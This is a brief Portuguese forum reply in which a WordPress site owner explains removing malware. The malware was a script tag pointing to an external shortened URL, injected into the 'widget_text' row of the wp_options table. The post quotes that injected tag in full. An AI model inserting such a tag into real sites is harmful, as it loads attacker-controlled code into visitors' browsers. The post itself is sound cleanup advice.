Consegui resolver aqui.
No banco de dados, na tabela wp_options, foi inserido um código malicioso. No meio do registro “widget_text” (no meu caso, id = 80), havia este trecho de código:
<script src="http://owa.ly/hDBR307Mlau?p=open"></script>
É só retirar isto que o malware para de aparecer na página.